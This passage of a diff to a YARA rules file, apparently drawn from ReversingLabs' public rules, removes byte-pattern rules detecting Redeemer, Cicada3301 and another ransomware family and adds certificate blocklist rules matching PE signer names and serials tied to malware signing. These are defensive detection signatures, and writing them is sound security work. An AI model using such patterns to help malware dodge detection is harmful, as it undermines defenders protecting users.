-            ?? ?? 89 6C 24 ?? 8D 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 85 C0 74 ?? C6 03 ?? A8 ?? 0F 85 ??
-            ?? ?? ?? 8B 7D ?? 8B 75 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 7C 24 ?? 89 74 24 ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 74 24 ?? 29 F0 89 44 24 ?? 8D 04 33 89
-            04 24 E8 ?? ?? ?? ?? 89 DF 8B 17 83 C7 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ??
-            ?? 74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 88 C1 00 C1 83 DF ?? 29 DF 8B 75
-        }
-		$remote_connection_p2 = {
-            89 34 24 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 29 F9 39 C1 0F 8D ?? ?? ?? ?? 8D 04 3B 83 F9
-            ?? 0F 83 ?? ?? ?? ?? 85 C9 74 ?? 8A 16 88 10 F6 C1 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 01 D8 89 04 24 E8 ?? ?? ?? ??
-            89 5C 24 ?? 8B 44 24 ?? 8B 00 89 04 24 E8 ?? ?? ?? ?? 8B 6D ?? 85 ED 74 ?? 8D 44 24
-            ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 44 24 ?? 8B 44 24 ?? 83 F8 ??
-            0F 82 ?? ?? ?? ?? C7 44 03 ?? ?? ?? ?? ?? 8D 48 ?? C1 E9 ?? 89 DF B8 ?? ?? ?? ?? F3
-            AB E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 90 8D 74 26 ??
-            8D 40 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 10 89 54 24 ?? 8B 50 ?? 89 54 24 ?? 8B 40 ?? 89
-            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89
-            DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ?? A9
-        }
-		$remote_connection_p3 = {
-            75 ?? C1 E8 ?? 83 C2 ?? 88 C1 00 C1 83 DA ?? 29 DA 8D 3C 13 B8 ?? ?? ?? ?? 29 D0 E9
-            ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 29 F8 89 44 24 ?? 89
-            74 24 ?? 01 DF 89 3C 24 E8 ?? ?? ?? ?? 89 D8 8B 08 83 C0 ?? 8D 91 ?? ?? ?? ?? F7 D1
-            21 CA 81 E2 ?? ?? ?? ?? 74 ?? F7 C2 ?? ?? ?? ?? 75 ?? C1 EA ?? 83 C0 ?? 88 D1 00 D1
-            83 D8 ?? 29 D8 BA ?? ?? ?? ?? 29 C2 E9 ?? ?? ?? ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ??
-            8B 16 89 10 8B 54 0E ?? 89 54 08 ?? 8D 78 ?? 83 E7 ?? 29 F8 29 C6 01 C1 C1 E9 ?? F3
-            A5 E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 89 54 24 ?? 8D 46 ?? 89
-            04 24 E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ??
-            ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 8B 54 24 ?? 29 C2 89 D5 E9 ?? ??
-            ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 8B 44 24 ?? 66 C7 44 03 ?? ?? ?? E9
-            ?? ?? ?? ?? 66 8B 54 0E ?? 66 89 54 08 ?? E9 ?? ?? ?? ?? 90 8B 54 24 ?? 8B 44 24 ??
-            E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RotA Games ApS" and pe.signatures [ i ] . serial == "38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" and 1613088000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "fd19ce61-056b-549a-946e-72543ff1f7c0"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12274-L12292"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "eb5288d2b96ff7a7783c2b2b02f9f1168784352ed84ad6463dce00c12daca6cb"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANKADA GROUP, d.o.o." and ( pe.signatures [ i ] . serial == "00:bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" or pe.signatures [ i ] . serial == "bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" ) and 1616630400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Redeemer : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Redeemer ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "080ab595-862b-5dc2-aaff-a0efd819a9fa"
-		date = "2022-01-17"
-		modified = "2022-01-17"
+		id = "6e8ffb39-d00d-54ca-a4be-68f6dd92d798"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Redeemer.yara#L1-L105"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12294-L12310"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "28287f6620a2f7a90057d1f97947e065721119e26398fe659331dc5fe99761de"
+		logic_hash = "12235e324b92b83e9cfaed7cbcff5d093b8b1d7528dd5ac327159cde6e9a4d1f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Redeemer"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
-            8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 89 B5 ?? ??
-            ?? ?? 89 B5 ?? ?? ?? ?? 3B F7 0F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 3D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ??
-            C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ??
-            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B
-            CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0
-        }
-		$encrypt_files_p1 = {
-            80 FB ?? 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 55 ?? 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ??
-            C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2
-            6A ?? 66 89 10 8D 45 ?? 52 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83
-            79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2 6A ?? 66 89 10 8D 45 ??
-            52 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 8D 45 ?? 3B C6
-            74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ??
-            ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6 45
-        }
-		$encrypt_files_p2 = {
-            8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 35 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ??
-            50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D6 85 C0 0F 85 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 50 FF D6 8B 85 ?? ?? ??
-            ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C4 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33
-            C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8
-        }
-		$modify_processes_p1 = {
-            8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50
-        }
-		$modify_processes_p2 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ?? ?? 6A ?? 8D 04 52 8D 04 C1
-            50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F
-            43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D B5
-            ?? ?? ?? ?? 0F 43 95 ?? ?? ?? ?? 0F 43 B5 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C8 ??
-            50 56 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 8D 04 52 8D 04 C1 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ??
-            ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC FF 37 E8
-            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C6 45 ?? ?? 8D 85 ?? ??
-            ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 FF 77
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Everything Wow s.r.o." and pe.signatures [ i ] . serial == "49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" and 1594252800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f6d0808d-4748-5b9f-9be2-7753292a6209"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12312-L12328"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "978f05f86734c63afe1e5929a58f3cfff75ef749ffda07252db90b6fe12508ec"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $modify_processes_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "25:c6:db:ce:3d:54:99:f6:5d:9d:f1:6e:90:07:46:5d" and 1626566400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cicada3301 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cicada3301 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c1a60870-0b68-5f2f-a74f-34e493a5e251"
-		date = "2024-10-09"
-		modified = "2024-10-09"
+		id = "ac5ac6d7-898b-5547-8d35-a483f20edcd6"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Cicada3301.yara#L1-L309"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12330-L12348"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9479667fd4c7f865607ece6af985ab6fa7b62f98738c338e4155059551db8a21"
+		logic_hash = "9b678e9fb1e1eda3ac8e027b5e449af446de4379fea46ef7ff820240c73795ee"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cicada3301"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$get_valid_drives = {
-            55 89 E5 53 57 56 83 EC ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 28 0D ?? ?? ?? ?? 0F 28 15 ?? ??
-            ?? ?? 89 C6 0F 11 00 0F 11 48 ?? 0F 28 0D ?? ?? ?? ?? 0F 11 50 ?? 0F 28 15 ?? ?? ??
-            ?? 0F 11 48 ?? 0F 28 0D ?? ?? ?? ?? 0F 11 50 ?? 0F 11 48 ?? C7 40 ?? ?? ?? ?? ?? C7
-            40 ?? ?? ?? ?? ?? 83 C0 ?? 8D 4D ?? 50 56 51 E8 ?? ?? ?? ?? 83 C4 ?? 80 7D ?? ?? 0F
-            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B 5D ??
-            8D 04 7F 89 75 ?? 89 7D ?? 8D 74 83 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 90 57 6A ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 4F ?? 39 D1 0F 83 ?? ?? ?? ?? 39 D0 0F
-            83 ?? ?? ?? ?? 8B 56 ?? 8D 04 40 89 CF 89 55 ?? F2 0F 10 06 F2 0F 11 45 ?? 8B 54 83
-            ?? F2 0F 10 04 83 F2 0F 11 06 89 56 ?? 83 C6 ?? 83 F9 ?? 8B 55 ?? 89 54 83 ?? F2 0F
-            10 45 ?? F2 0F 11 04 83 77 ?? 8B 45 ?? 8B 75 ?? FF 08 75 ?? FF 48 ?? 75 ?? 6A ?? 68
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 45 ?? F2 0F 10 45 ?? 89 47 ?? F2
-            0F 11 07 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F8 83 C4 ?? 5E 5F 5B 5D C3
-        }
-		$collect_files_recursively_p1 = {
-            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8B 75 ?? 8B 45 ?? 89
-            4C 24 ?? 89 44 24 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 84 C0 0F 84 ?? ?? ?? ??
-            8D 9C 24 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ??
-            8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            53 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B
-            5D ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 04 FB C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
-            8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D B4 24 ?? ?? ?? ?? 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 56 8D 74 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 52 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B BC 24 ?? ?? ?? ?? 8B 9C
-            24 ?? ?? ?? ?? 85 FF 89 FA 0F 44 D3 8D 8C 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 85 DB 74 ??
-            6A ?? 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 7D
-            ?? 89 44 24 ?? 89 0C 24 EB ?? 66 90 83 C7 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 3B BC
-        }
-		$collect_files_recursively_p2 = {
-            24 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 77 ?? FF 37 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? FF 34 24 FF 74 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? FF 74 24
-            ?? 56 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 84
-            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? F2 0F 10 94 24 ?? ?? ??
-            ?? F2 0F 10 8C 24 ?? ?? ?? ?? 8B 5C 24 ?? 89 84 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ??
-            ?? ?? F2 0F 11 8C 24 ?? ?? ?? ?? F2 0F 11 94 24 ?? ?? ?? ?? FF 74 24 ?? 53 8D 84 24
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 24 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8B B4 24 ?? ?? ?? ?? 85 F6 74 ?? 8B 9C 24 ?? ?? ?? ?? 83 C3 ?? EB ?? 66 2E 0F
-            1F 84 00 ?? ?? ?? ?? 90 83 C3 ?? 4E 74 ?? 83 7B ?? ?? 72 ?? 8B 03 85 C0 74 ?? C1 E0
-            ?? 6A ?? 50 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 90
-            8B 84 24 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C1 E0 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8D 44 24 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 5C 24 ?? 89 44 24 ?? 89 54 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F
-            85 ?? ?? ?? ?? 8B 74 24 ?? F0 FF 86 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F
-            1F 44 00 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 8D 84 24 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 83 F0 ?? 0B 84 24 ?? ?? ?? ?? 75 ?? 8B 84
-            24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? EB
-        }
-		$collect_files_recursively_p3 = {
-            8D 94 24 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 D7 89 DE F3 A5 8B 84 24
-            ?? ?? ?? ?? 83 F0 ?? 0B 84 24 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 77 ?? 8B 1F 8B 06 53 FF D0 83 C4 ?? 8B 46
